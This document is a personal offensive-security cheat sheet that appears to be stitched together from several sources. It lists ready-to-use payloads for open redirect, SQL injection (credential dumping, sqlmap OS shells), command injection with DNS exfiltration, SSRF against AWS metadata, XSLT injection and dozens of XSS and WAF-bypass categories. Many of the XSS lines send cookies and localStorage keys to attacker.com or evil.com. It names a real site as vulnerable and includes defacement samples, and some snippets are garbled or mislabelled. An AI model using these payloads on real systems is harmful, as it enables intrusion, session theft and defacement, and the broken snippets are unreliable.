
//www.google.com/%2f%2e%2e

//www.google.com/%2e%2e

//google.com/

//google.com/%2f..

//\google.com

/\victim.com:80%40google.com

Possible open redirect parameters

?url=http://{target}

?url=https://{target}

?next=http://{target}

?next=https://{target}

?url=https://{target}

?url=http://{target}

?url=//{target}

?url=$2f%2f{target}

?next=//{target}

?next=$2f%2f{target}

?url=//{target}

?url=$2f%2f{target}

?url=//{target}

/redirect/{target}

/cgi-bin/redirect.cgi?{target}

/out/{target}

/out?{target}

/out?/{target}

/out?//{target}

/out?/\{target}

/out?///{target}

?view={target}

?view=/{target}

?view=//{target}

?view=/\{target}

?view=///{target}

/login?to={target}

/login?to=/{target}

/login?to=//{target}

/login?to=/\{target}

/login?to=///{target}

Open Redirect Payloads by @cujanovic

https://github.com/cujanovic/Open-Redirect-Payloads

Open Redirect Paramters by @fuzzdb-project

https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt

SQLI

Akamai Kona Bypass

• MID instead of SUBSTRING

• LIKE instead of =

• /**/ instead of a space

• CURRENT_USER instead of CURRENT_USER()

• " instead of '

Final example:

444/**/OR/**/MID(CURRENT_USER,1,1)/**/LIKE/**/"p"/**/#

[+] Union Based SQL Injection

' or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#


sqlmap --url="<url>" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs



==============SQL injection:
Resources:    https://portswigger.net/web-security/sql-injection
              Web application hackers handbook by Pinto and Stuttard

SQL injection Cheat Sheets:   https://portswigger.net/web-security/sql-injection/cheat-sheet
                              http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet


General:
use single quotation mark ' to test for sql vulnerabiltiy
use double dash to terminate the query --
      On MySQL the -- sequence must be followed by a space. Alternatively, # can be used

          Submitting the single quote character ' and looking for errors or other anomalies.
          Submitting some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a different value, and looking for systematic differences in the resulting application responses.
          Submitting Boolean conditions such as OR 1=1 and OR 1=2, and looking for differences in the application's responses.
          Submitting payloads designed to trigger time delays when executed within an SQL query, and looking for differences in the time taken to respond.
          Submitting OAST payloads designed to trigger an out-of-band network interaction when executed within an SQL query, and monitoring for any resulting interactions.


=== Basic SQL injection:
e.g. Login Form:  username=administrator'-- and arbitrary password
                  username=administrator'-- -
                  password=pw' OR 1=1 --
                  password=pw' OR 1=1 -- -
                  password=pw' OR 'b'='b
    Try to register a user like username=administrator' OR 1=1 --
    Or                          username=administrator' OR 1=1 -- -
    in this case check for second-order sql injections

=== UNION SQL injection:
The union keyword lets you execute additional select statements:
--> Conditions:
    You must return the same number of columns as the original query
    The results of the injected query must match the data type of the original query.
  1. --> Determine the number of columns:
      1.1. Method:
          Inject an ORDER BY n-- clause until an error occurs
            --> ' ORDER BY 1--   --> NO ERROR
            --> ' ORDER BY 2--   --> NO ERRROR
            --> ' ORDER BY 3--   --> ERROR --> 2 columns (Error may be an SQL error, generic message or an empty result)
      1.2. Method:
          Querying different numbers of NULL values
            --> UNION SELECT NULL--                     --> ERROR   --> more than 1 column
            --> UNION SELECT NULL, NULL--               --> NO ERROR  (maybe an additonal row of NULL values is being returned)
                                                        --> DIFFERENT ERROR (may return a distinct error message)
                                                            However, the same error message as in the 1st & 3rd test could appear. --> This situation makes the method ineffective
            --> UNION SELECT NULL, NULL, NULL--         --> ERROR   --> less than 3 columns -> 2 columns
      NOTES: In Oracle databases a SELECT statement needs to have a FROM clause
                    --> using the built in DUAL table -->     ' UNION SELECT NULL FROM DUAL--.

  2. --> Determine the data type of a column:
      2.1. Assuming we want to return a String -> Determine which column can represents string value
           Assuming that we determined that the query returns 2 coulums
           --> ' UNION SELECT 'a',NULL--
           --> ' UNION SELECT NULL,'a'--
              --> If an error occurs the datatype is not compatible with the coulumn

  3. --> Retrieving data (adhere to number of columns and data type):
      3.1. ' UNION SELECT <columname>, <columnname> FROM <table>--
              ' UNION SELECT username, password FROM usertable--

      3.2. Retrieving database information (adhere to number of columns and data type):
                    -Microsoft, MySQL: 	  SELECT @@version
                    -Oracle: 	            SELECT * FROM v$version
                    -PostgreSQL: 	        SELECT version()

      3.3. Retrieving content information from NON-Oracle databases (adhere to the number of columns and data type):
                    SELECT TABLE_NAME FROM information_schema.tables
                    -->     Columns to select:  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  TABLE_TYPE

                    SELECT COLUMN_NAME FROM information_schema.columns WHRER TABLE_NAME = '<table_name>'
                    -->     Columns to select:  TABLE_CATALOG  TABLE_SCHEMA  TABLE_NAME  COLUMN_NAME  DATA_TYPE

          Retrieving content information from Oracle databases (adhere to the number of columns and data type):
                    SELECT table_name FROM all_tables

                    SELECT * FROM all_tab_columns WHERE table_name = 'USERS'

                    SELECT column_name, table_name FROM cols

      3.4. Concatenate values in a single column
            ' UNION SELECT username || '~' || password FROM users--


=== Blind SQL injection:
The application contains SQL injection vulnerabilities but does not return any results of the query or error messages


=== Using SQLMAP:

1. Store the request to a file using Burp (e.g. file called login.req)
2. Test for vulnerable parameters in request
sqlmap -r login.req --level=5 --risk=3 --threads=10

3. If vulnerable parameter is found:
  3.1 Enumerate database tables:
        sqlmap -r login.req --level=5 --risk=3 --threads=10 --tables
  3.2 Retrieve Tables:
        sqlmap -r login.req --level=5 --risk=3 -T <found_table_name> --dump
  3.3 Get Shells:
      3.3.1 SQL shell
          sqlmap -r login.req --level=5 --risk=3 --sql-shell
      3.3.2 System shell
          sqlmap -r login.req --level=5 --risk=3 --os-shell
      3.3.3 Other shell parameters
          sqlmap -help|grep shell


==============Command injection:
Resources:  https://portswigger.net/web-security/os-command-injection
            https://www.owasp.org/index.php/Command_Injection
            https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)


characters for command separation:
    &
    &&
    |
    ||

only on Unix-based systems:

    ;
    Newline (0x0a or \n)

On Unix-based systems, also use the following to perform inline execution of an injected command within the original command:

    ` injected command `
    $( injected command )

--> Useful Commands (not blind OR using > to output in a readable file):

Win & unix:   whoami
Lin           cat /etc/passwd
Win           type C:\boot.ini
Lin           ifconfig
Win           ipconfig
Lin           uname -a
Win           ver

--> Useful commands when blind:
ping -c 10 myip   and monitor interface
ping -c 10 127.0.0.1    and wait for delay
nslookup mydomain.com      and monitor the request (may use a subdomain to differentiate between requests)
nslookup `whoami`.mydomain.com      to exfiltrate command output

Blogs

• http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

• http://isc.sans.edu/diary.html?storyid=9397

• http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

• http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html

• http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections

• http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/

• http://sqlzoo.net/hack/

• http://www.sqlteam.com/article/sql-server-versions

• http://www.krazl.com/blog/?p=3

• http://www.owasp.org/index.php/Testing_for_MS_Access

• http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html

• http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html

• http://www.youtube.com/watch?v=WkHkryIoLD0

• http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf

• http://vimeo.com/3418947

• http://sla.ckers.org/forum/read.php?24,33903

• http://websec.files.wordpress.com/2010/11/sqli2.pdf

• http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

• http://ha.ckers.org/sqlinjection/

• [http://lab.mediaservice.net/notes_more.php?id=MSSQL](http://lab.mediaservice.net/notes_more.php?id=MSSQL

SSRF

http://0177.1/

http://0x7f.1/

http://127.000.000.1

https://520968996

Note: The latter can be calculated using http://www.subnetmask.info/

Exotic Handlers

gopher://, dict://, php://, jar://, tftp://

IPv6

http://[::1]

http://[::]

Wildcard DNS

10.0.0.1.xip.io
www.10.0.0.1.xip.io
mysite.10.0.0.1.xip.io
foo.bar.10.0.0.1.xip.io

Link: http://xip.io

10.0.0.1.nip.io
app.10.0.0.1.nip.io
customer1.app.10.0.0.1.nip.io
customer2.app.10.0.0.1.nip.io
otherapp.10.0.0.1.nip.io

Link: http://nip.io

AWS EC2 Metadata

http://169.254.169.254/latest/meta-data/  

http://169.254.169.254/latest/meta-data/local-hostname

http://169.254.169.254/latest/meta-data/public-hostname

If there is an IAM role associated with the instance, role-name is the name of the role, and role-name contains the temporary security credentials associated with the role [...]

Link: http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html (includes a comprehensive Instance Metadata Categories table)

XSLT Injection

Backend infos

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
	<body>
		<xsl:text>xsl:vendor = </xsl:text><xsl:value-of select="system-property('xsl:vendor')"/><br/>
		<xsl:text>xsl:version = </xsl:text><xsl:value-of select="system-property('xsl:version')"/><br/>
	</body>
</html>

Injecting in PHP

<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
	<body>
		<xsl:value-of name="bugbounty" select="php:function('phpinfo')"/>
	</body>
</html>

XSS

##XSS Bypass by Url Encoding

************Vulnerble : https://www.nobullproject.com/collections/shop?q=

XSS with Image Injection :)

%3Cimg%20src%3Dhttps%3A%2F%2Fcdn.pixabay.com%2Fanimation%2F2023%2F09%2F07%2F21%2F54%2F21-54-00-174_512.gif%20%3E

%3Cmarquee%3E%3Cimg%20src%3D%22https%3A%2F%2Fcdn.pixabay.com%2Fanimation%2F2023%2F09%2F07%2F21%2F54%2F21-54-00-174_512.gif%22%20alt%3D%22GIF%22%3E%20Rohit%20is%20the%20real%20Mr.%20Robot%3C%2Fmarquee%3E%0D%0A

Adding Marquee tag :)

%3Cmarquee%3ERohit%20hacked%20this%20website%20using%20xss%3C%2Fmarquee%3E

%3Cmarquee%20style%3D%22font-family%3A%20%27Hack%27%2C%20monospace%3B%20color%3A%20green%3B%22%3ERohit%20hacked%20this%20website%20using%20XSS%3C%2Fmarquee%3E%0D%0A

To check HTMLI --> test

open redirect

%3Cimg%20src%3Dx%20onerror%3D%22window.location.href%3D%27https%3A%2F%2Fwww.youtube.com%2F%40hackwithrohit-new-2k%27%3B%22%3E%0D%0A%0D%0A

---

https://dencode.com/en/

1. Basic XSS Payloads

These are simple payloads typically used for testing.

<script>alert('XSS')</script>
<svg/onload=alert('XSS')>
<img src=x onerror=alert('XSS')>
<iframe src="javascript:alert('XSS');"></iframe>
<math><mtext><title>1</title><mtext><style><img src=x onerror=alert(1)> // MathML vector
<marquee onstart=alert('XSS')>Test</marquee>
<details open ontoggle=alert('XSS')>Test</details>
<isindex type=image src=1 onerror=alert('XSS')>

2. Event Handler-Based Payloads

XSS vectors relying on event attributes.

<img src="x" onerror="alert('XSS')">
<body onload=alert('XSS')>
<input type="button" value="Click" onclick="alert('XSS')">
<div onmouseover="alert('XSS')">Mouse over me</div>
<a href="javascript:alert('XSS')">Click me</a>

3. JavaScript Protocol Injection

Injecting via JavaScript URI.

<a href="javascript:alert('XSS')">Click me</a>
<iframe src="javascript:alert('XSS');"></iframe>
<object data="javascript:alert('XSS');"></object>

4. HTML Attribute Injection

Payloads placed within an HTML tag’s attribute to break out of the context.

<input type="text" value="XSS" onfocus="alert('XSS')" autofocus>
<form action="test" onsubmit="alert('XSS')"><input type="submit"></form>
<textarea autofocus onfocus="alert('XSS')">Text</textarea>

5. SVG and Vector Image Payloads

Leverage vector image formats such as SVG for XSS.

<svg/onload=alert('XSS')>
<svg><desc><![CDATA[<script>alert('XSS')</script>]]></desc></svg>
<svg><foreignObject><body xmlns="http://www.w3.org/1999/xhtml" onload="alert('XSS')"></body></foreignObject></svg>

6. Advanced Injection Techniques

Involving bypassing filters or making injections harder to detect.

<svg><script>alert`1`</script></svg>  // Using backticks
<script x=">" src="http://attacker.com/xss.js"></script>  // Attribute confusion
<iframe srcdoc="<script>alert('XSS')</script>"></iframe>  // srcdoc attribute
<script>const alert=window.alert.bind(window);alert('XSS')</script> // JavaScript function binding

7. DOM-Based XSS Payloads

Payloads targeting insecure JavaScript code.

<script>document.write('<img src="x" onerror="alert(\'XSS\')">');</script>
<input id="test" oninput="location.href='javascript:alert('+this.value+')'">

8. HTML5 and Modern Techniques

Taking advantage of new HTML5 elements.

<video><source onerror="alert('XSS')"></video>
<keygen autofocus onfocus=alert(1)>
<audio src onloadstart=alert(1)>
<meter value=2 min=0 max=10 onmouseover=alert(1)>X</meter>
<output onforminput="alert(1)">X</output>
<progress value=10 max=100 onclick=alert(1)>Progress</progress>

9. Malformed Tags or Encoded Bypasses

Use malformed tags or entities to bypass filters.

<scr<script>ipt>alert('XSS')</scr<script>ipt>  // Broken up script tag
<script>alert(String.fromCharCode(88,83,83))</script>  // Obfuscated alert using char codes
<scr%0ipt>alert('XSS')</scr%0ipt>  // Using URL-encoded characters

10. URL Parameter-Based XSS

Payloads embedded in the query string.

http://example.com/index.php?name=<script>alert('XSS')</script>
http://example.com/?q=%3Cscript%3Ealert(document.cookie)%3C/script%3E
javascript:eval("alert('XSS')")

11. Cookie Theft via XSS

Using JavaScript to steal cookies.

<script>document.location='http://attacker.com/?cookie='+document.cookie</script>
<img src="x" onerror="fetch('http://attacker.com?cookie='+document.cookie)">
<script>new Image().src="http://attacker.com/"+document.cookie;</script>

12. XSS in Contexts Other Than HTML

Injected into JSON, XML, or other non-standard contexts.

{"name":"<script>alert('XSS')</script>"}
<username><![CDATA[<script>alert('XSS')</script>]]></username>

13. AngularJS Template Injection

Leverage AngularJS templating system.

{{constructor.constructor('alert(1)')()}}
{{'a'.constructor.prototype.charAt=[].join;$eval('alert(1)')}}

14. Exploiting InnerHTML Vulnerabilities

Common with dynamic JavaScript rendering using .innerHTML.

<script>document.body.innerHTML='<img src=x onerror=alert(1)>';</script>
<div id="div1" onclick="document.getElementById('div1').innerHTML='<img src=x onerror=alert(1)>'">Click me</div>

15. XSS Payloads Exploiting CSS

Using CSS injection to trigger JavaScript.

<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
<style>body{background:url('javascript:alert(1)')}</style>

16. Event Handler Abusing HTML5 Elements

New event handlers introduced with HTML5.

<input onblur="alert('XSS')" autofocus>
<body ononline="alert('XSS')">
<select onchange="alert('XSS')"><option>1</option><option>2</option></select>

17. HTML Comment Injection

Attempting XSS via HTML comment manipulation.

<!--<script>alert(1)</script> -->
<!-- Comment trick --><script>alert(1)</script>

18. Multipart Payloads and Bypasses

Payloads spread across multiple elements to evade WAFs and filters.

<scr<script>ipt>alert('XSS')</scr<script>ipt>

19. Flash and VML Payloads

Exploiting legacy technologies.

<vmlframe src="javascript:alert('XSS')"></vmlframe>
<embed src="data:image/svg+xml;base64,..." allowScriptAccess="always"></embed>

20. Stored XSS Payloads

Used for persistence in databases.

<script>fetch('http://attacker.com', {method: 'POST', body: document.cookie})</script>
<div data-xss="<img src=x onerror=alert('XSS')>"></div>
<script>localStorage.setItem('payload','<img src=x onerror=alert(1)>');</script>

21. Using Fetch or XMLHttpRequest

Stealing information via web requests.

<script>fetch('http://evil.com',{method:'POST',body:document.cookie})</script>
<script>var xhr=new XMLHttpRequest();xhr.open('GET','http://attacker.com',true);xhr.send(document.cookie);</script>

22. Blind XSS Payloads

Blind XSS payloads are often used when you do not see the immediate result but need to send data to an external server for verification.

<script>new Image().src="http://attacker.com/?cookie="+document.cookie;</script>
<img src="x" onerror="fetch('http://attacker.com/blindxss?data='+document.cookie)">
<svg/onload="fetch('http://attacker.com?xss='+btoa(document.cookie))">
<iframe src="javascript:fetch('http://attacker.com/blind?cookie='+encodeURIComponent(document.cookie))"></iframe>
<script>document.location='http://attacker.com/blind/?cookie='+document.cookie</script>

23. Base64 Encoded Payloads

Encoding the payload in Base64 to evade detection.

<svg><script>eval(atob('YWxlcnQoMSk='))</script></svg>  // "alert(1)" in Base64
<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ1hTUycpPg==">  // Base64 encoded payload with alert('XSS')
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>  // Base64 HTML with alert(1)

24. URL Encoding and Double Encoding

Using URL encoding to obfuscate scripts and bypass filters.

%3Cscript%3Ealert('XSS')%3C%2Fscript%3E  // <script>alert('XSS')</script>
<iframe src="javascript%3Aalert%28%27XSS%27%29"></iframe>
<img src="javascript%3A%2520alert%28%27XSS%27%29">

25. UTF-16/Unicode Encoding

Payloads that use alternative character encodings to bypass security.

<script>alert('\u0041\u0042\u0043')</script>  // Unicode for "ABC"
<script>alert(String.fromCharCode(88,83,83))</script>  // XSS in character codes
<svg onload=\u0061\u006c\u0065\u0072\u0074(1)>  // Unicode for alert(1)

26. Polyglot XSS Payloads

Polyglot payloads can execute as HTML, JavaScript, CSS, or other contexts to ensure broad applicability.

"><img src=x onerror=alert(1)>'"><script>alert(1)</script>
"><svg onload="alert('XSS')"></svg> --><p " --><svg onload=alert(1)></svg>
'";alert(String.fromCharCode(88,83,83))//</script>

27. Using Non-Printable Characters

Use control characters to bypass filters that do not handle them properly.

<svg/onload=\x0Aalert(1)>
<script>alert('XSS')</script>\x0B  // Non-printable characters

28. Mixed Context Injection

Payloads that abuse JavaScript, HTML, and CSS mixed together.

<style>@keyframes x{}</style><div style="animation-name:x" onanimationstart="alert(1)"></div>
"><style>body{background:url("javascript:alert('XSS')")}</style>
"><iframe src="javascript:`/*--><svg onload=alert(1)><!--*/`"></iframe>

29. HTML5 Cross-Browser Quirks

Exploiting specific quirks across different HTML5 elements and attributes.

<object type="image/svg+xml" data="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert('XSS')</script></svg>"></object>
<video><source onerror="alert('XSS')"></video>
<xss id="test"/x="><img src=x onerror=alert(1)>">
<div draggable="true" ondrag="alert('XSS')">Drag me</div>

30. JavaScript Prototype Pollution

Using prototype pollution to trigger JavaScript execution.

<script>
  Object.prototype.x = function() {alert('XSS')};
  [].x();
</script>

31. Data URIs for XSS Payload Delivery

Using data URIs to deliver XSS payloads.

<img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
<a href="data:text/html,<script>alert('XSS')</script>">Click me</a>

32. Null Byte Injection

Use null bytes to terminate strings early or confuse parsers.

<script\x00>alert('XSS')</script>
<img src="x" onerror="alert(String.fromCharCode(0x00))">

33. XSS via Metadata Tags

Using <meta> tags in certain scenarios to trigger XSS.

<meta http-equiv="refresh" content="0; url=javascript:alert(1)">
<meta charset="utf-7"><script>alert('XSS')</script>  // Works with old IE browsers

34. XSS Payloads Using Document and Window

Using JavaScript window and document objects to extract sensitive information.

<script>document.location='http://attacker.com?cookie='+document.cookie</script>
<script>window.open('http://attacker.com/?cookie='+document.cookie)</script>
<script>new Image().src='http://attacker.com/log?key='+localStorage.getItem('user_key');</script>

35. XSS Using JavaScript Comments

Comment-based payloads to make detection more difficult.

<script>/*alert('XSS')*/alert(1)//</script>
<!--<img src="x" onerror="alert('XSS')">-->
<script>//<!--alert('XSS')</script>

36. Blind XSS in Headers

Often useful in APIs where headers are rendered directly in logs.

User-Agent: "><script>alert('XSS')</script>
Referer: javascript:alert('XSS')
Content-Type: text/html;charset=UTF-7

37. SVG and XML Entities Abuse

Payloads that leverage SVG and XML entities.

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" onload="alert('XSS')"></svg>

38. NoScript Contexts (Injection in Non-Script Tags)

Inject XSS payloads in attributes that are not meant for scripts.

<math xmlns="http://www.w3.org/1998/Math/MathML"><mtext><title><![CDATA[<img src="x" onerror="alert(1)">]]></title></mtext></math>
<div id="div1" onclick="document.getElementById('div1').innerHTML='<img src=x onerror=alert(1)>'">Click me</div>

39. XSS in Template Engines

Payloads designed to abuse popular web template engines (e.g., JSP, Thymeleaf, Jinja).

${@java.lang.Runtime@getRuntime().exec('calc')}
{{constructor.constructor('alert(1)')()}}
#{T(java.lang.Runtime).getRuntime().exec('touch /tmp/pwned')}

40. XSS Using CSS (Style Attribute)

CSS injection leveraging HTML attributes to trigger JavaScript.

<div style="background-image:url(javascript:alert('XSS'))">Test</div>
<style>body{color:expression(alert(1))}</style>  // Obsolete in newer versions of IE

41. XSS via XPath Injection

XPath injections with inline JavaScript.

<name>
  <![CDATA[<script>alert('XSS')</script>]]>
</name>

42. Obfuscated JavaScript Techniques

Using obfuscation to evade detection, such as self-executing functions.

<svg><script>(function(){alert(1)})()</script></svg>
<script>eval('al'+'ert(1)')</script>
<script>Function('ale'+'rt(1)')()</script>
<script>$=String;$($('al'+'ert(1)'))()</script>

43. Filter Bypass Techniques

Using different encodings and bypass tricks to avoid typical XSS filters.

<scr%0ipt>alert(1)</scr%0ipt>
<script>al\ert(1)</script>  // Bypassing simplistic "alert" filter
<scr<script>ipt>alert('XSS')</scr<script>ipt>

44. WAF Bypass Techniques with Modified Syntax

These techniques leverage different ways to write payloads that may not match a WAF's strict rules.

<script>alert`1`</script>  // Using backticks instead of parentheses
<script>alert&#40;1&#41;</script>  // HTML entity encoding
<script src=data:text/javascript,alert(1)></script>  // Data URI usage
<script>self </script>  // Using property lookup
<script>this </script>  // Concatenation in function name
<svg/onload="top ">  // Obfuscation through numbers

45. HTML Entity and Mixed Encoding Techniques

Using HTML entities and mixed character encoding to slip past WAF rules.

<scr<script>ipt>alert(String.fromCharCode(88,83,83))</scr<script>ipt>
<img src=x onerror=&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;>
<svg/onload=&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;>
<script>alert('\x58\x53\x53')</script>  // Hexadecimal encoding
<iframe src="javascript&colon;alert&lpar;1&rpar;"></iframe>  // Colon and parentheses HTML encoding

46. Bypassing Common HTML Attribute Restrictions

Using unconventional characters, malformed attributes, and malformed tags.

<img sRc=X oNERror=alert(1)>  // Capital letters to bypass case-sensitive filters
<img src=1 href=1 onerror='javascript:/*--></script><script>alert(1)//'>
<sVg><scRiPt>alert(1)</sCriPt></svG>  // SVG combined with scripting to confuse filters
<form><button formaction="javascript:alert(1)">Click Me</button></form>  // Button with formaction
<video><source onerror="alert(1)"></video>

47. Random Whitespaces and Newline Characters

Adding arbitrary spaces, newlines, or invisible characters to bypass WAF pattern matching.

<scr  ipt>alert(1)</scr  ipt>
<script
>alert('XSS')</script>
<svg onload="aler
t(1)">
<IMG SRC=javascript: alert('XSS')>  // Whitespace between "javascript:" and "alert"
<input value="``onmouseover='alert(1)'">

48. In-line JavaScript Comments to Break Patterns

Using in-line comments to disrupt typical WAF signatures.

<script>/*alert*/(1)</script>
<script>/*-alert-*/(1)</script>
<script>self['ale'+'rt']/*alert*/(1)</script>
<svg/onload="al/*comment*/ert(1)">

49. Broken or Split Tags

Splitting important parts of the script to confuse pattern matching.

<scr<script>ipt>alert('XSS')</scr<script>ipt>
<svg><scri</svg>pt>alert(1)</script>
<scri%00pt>alert('XSS')</scri%00pt>  // Null byte insertion
<scri</scri>pt>alert('XSS')</script>  // Closing the script in unexpected ways

50. WAF Bypass with Improper Unicode Handling

Using mixed character sets that exploit improper Unicode parsing in the WAF.

<scrіpt>alert(1)</scrіpt>  // Using a Cyrillic 'і' instead of the Latin 'i'
<scrīpt>alert(1)</scrīpt>  // Unicode look-alike characters
<iframe src="javas\u0063ript:alert(1)"></iframe>  // Unicode escape

51. Non-Standard Protocol Usage

Leveraging non-standard protocols and pseudo-protocols.

<iframe src="javascript:alert(1)"></iframe>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">Click</a>  // Data URI with base64 encoded JavaScript
<img src="javascript:alert(1)">  // Usage of `javascript:` in image src
<img src="vbscript:msgbox('XSS')">  // VBScript (in very old IE versions)

52. JavaScript Protocol Wrapping

Bypass using different JavaScript wrappers and encodings.

<a href="java&#x09;script:alert(1)">Click here</a>  // Tab character between "javascript"
<iframe src="javascript:/*-alert(1)"></iframe>
<svg><script>this.onerror=alert;throw 1</script></svg>
<a href="java&#x0D;script:alert(1)">Click here</a>  // Carriage return

53. HTML 5 and SVG Content Bypasses

Exploiting new HTML5 features and SVG quirks to slip through WAFs.

<details open ontoggle="alert(1)">Click Me</details>
<svg><use xlink:href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg'><script>alert(1)</script>"></use></svg>
<meter value="2" min="0" max="10" onmouseover="alert(1)">2</meter>
<foreignObject><body onload=alert(1)></body></foreignObject>  // In SVG context

54. CSS and Style Injection Techniques

Injecting CSS to trigger JavaScript or abusing the style tag.

<div style="width:expression(alert(1))">X</div>  // Internet Explorer-specific CSS
<x style="behavior:url(#default#time2)" onbegin="alert(1)">  // IE behaviors
<style>@import 'javascript:alert(1)';</style>  // Leveraging CSS @import
<div style="background:url(javascript:alert(1))">CSS Injection</div>

55. Using HTML Encoding Bypass

Combining multiple encoding methods to confuse security filters.

<script>&#97&#108&#101&#114&#116&#40&#49&#41</script>  // Decimal encoding mixed in a script
<img src='x' one&#x6Eerror=alert(1)>  // Mixing hex and text encoding
<scr&#x69;&#x70;t>alert(1)</scr&#x69;&#x70;t>  // Mixed with hexadecimal for tags

56. JavaScript Bypass Using Alternate Methods and Properties

Using alternate ways to execute JavaScript without directly invoking alert or script.

<script>top </script>  // Constructing alert dynamically
<iframe src="javascript:document.body.appendChild(document.createElement('script')).src='//attacker.com/xss.js';"></iframe>
<script>fetch('http://attacker.com/?'+document.cookie)</script>
<script>setTimeout('alert(1)',0)</script>
<svg onload="[].map.call('XSS', eval)">  // Abuse `eval` with `map`

57. Use of JavaScript Special Characters and Keyword Aliases

Avoiding keyword-based filters by using JavaScript's flexible syntax.

<script>self</script>  // Evaluates to alert(1)
<script>top </script>  // Alert with numeric trick
<svg onload="confirm.call(this,'XSS')">  // Using alternative function call like `confirm`

58. Bypass Using HTML5 Interactive Elements

Injecting XSS vectors within interactive HTML5 elements.

<form><input type="text" value="XSS" autofocus onfocus="alert(1)"></form>
<meter value="0.5" onmouseover="alert(1)">0.5</meter>
<output onforminput="alert(1)">XSS</output>
<keygen autofocus onfocus=alert(1)>  // Exploiting deprecated keygen tag

59. Self Executing JavaScript Functions

Using self-executing anonymous functions to trigger XSS.

<script>(function(){alert(1)})();</script>
<script>(()=>alert(1))()</script>
<script>((()=>alert(1)))()</script>

60. Double URL-Encoded JavaScript Payloads

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E  // Double encoding to bypass WAFs

61. Fragment Identifier Injection

<a href="http://example.com/#<script>alert(1)</script>">Click Me</a>  // Injecting JavaScript through fragments

62. Hash Character (#) to Bypass Filters

<script#>alert(1)</script#>  // Bypass some HTML parsers

63. JavaScript Event in Anchor Tag Attribute

<a href="#" onclick="javascript:alert('XSS')">Click</a>

64. Image src Attribute Using JavaScript URL Scheme

<img src="javascript:alert('XSS')">

65. Malformed Tags with Missing Closure

<script>alert('XSS')

66. Exploiting Frame Attributes

<iframe src="javascript:alert('XSS')"></iframe>

67. Inline JavaScript Execution with JSFiddle URL

<script src="https://jsfiddle.net/user/external.js"></script>  // External script load

68. JavaScript Execution Through HTML-Encoded Breaks

<script>alert('line1')\u000Aalert('line2')</script>

69. XSS Injection in JavaScript URL Redirect

<a href="javascript:document.location='http://attacker.com/?cookie='+document.cookie">Redirect</a>

70. Using JavaScript Constructors for Execution

<script>alert.constructor('alert(1)')()</script>

71. Polyglot Payload for Both JavaScript and JSON

{"name":"</script><script>alert(1)</script>"}

72. Abuse of the <noscript> Tag

<noscript><img src="x" onerror="alert(1)"></noscript>

73. Inline Style with JavaScript Execution

<div style="width:expression(alert(1))">XSS</div>  // Only effective in older IE versions

74. Encoded JavaScript URI Manipulation

<a href="jav&#x61;script:alert(1)">Click</a>

75. SVG Injection with Script Element

<svg><script>alert(1)</script></svg>

76. Abuse of ARIA Attributes for Injection

<div role="alert" aria-live="assertive" onfocus="alert(1)" tabindex="0">Focus me</div>

77. Abuse of Onscroll Event

<div onscroll="alert(1)">Scroll me</div>

78. Injecting JavaScript into Template Literals

<script>let a = `</script><script>alert(1)</script>`;</script>

79. Dynamic Script Injection Using Blob URLs

<script>let blob = new Blob(['alert(1)'], {type: 'text/javascript'}); let url = URL.createObjectURL(blob); document.body.appendChild(Object.assign(document.createElement('script'), {src: url}));</script>

80. Abuse of window.name

<script>window.name = '<img src="x" onerror="alert(1)">';</script>

81. Using <object> Tag for JavaScript Execution

<object data="javascript:alert('XSS')"></object>

82. Using <embed> Tag for XSS

<embed src="javascript:alert('XSS')">

83. Injection via Path Traversal in URLs

http://example.com/%3Cscript%3Ealert(1)%3C/script%3E

84. Template Injection in Handlebars.js

{{#with "constructor"}}{{this.alert "XSS"}}{{/with}}

85. Injection Using AngularJS ng-csp Bypass

{{constructor.constructor('alert(1)')()}}

86. Abuse of Event Listeners to Inject JavaScript

